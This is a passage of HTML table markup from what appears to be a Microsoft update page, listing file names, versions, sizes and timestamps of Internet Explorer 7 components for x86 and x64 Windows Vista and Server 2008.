class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">282,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,430,528</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,430,528</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:03</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">33,792</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:41</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">33,792</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,032,192</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,041,408</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">93,184</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:08</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">422,400</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">249,856</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">249,856</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">14-Feb-2014</td><td class=\"sbody-td\">11:23</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:03</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">13:23</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.19041</td><td class=\"sbody-td\">485,376</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:17</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23330</td><td class=\"sbody-td\">485,888</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">763,904</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">763,904</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:03</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">5,737,472</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">5,737,472</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:03</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:35</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">377,856</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">176,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">377,856</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">176,128</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">146,944</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">146,944</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">7,051,776</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">224,768</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">7,053,824</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">224,768</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">11:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">302,592</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieinstal.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">302,592</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:36</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:35</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:41</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">498,688</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">09-Sep-2011</td><td class=\"sbody-td\">11:34</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.19041</td><td class=\"sbody-td\">389,632</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:13</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23330</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:15</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:04</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">08:54</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.19041</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23330</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td 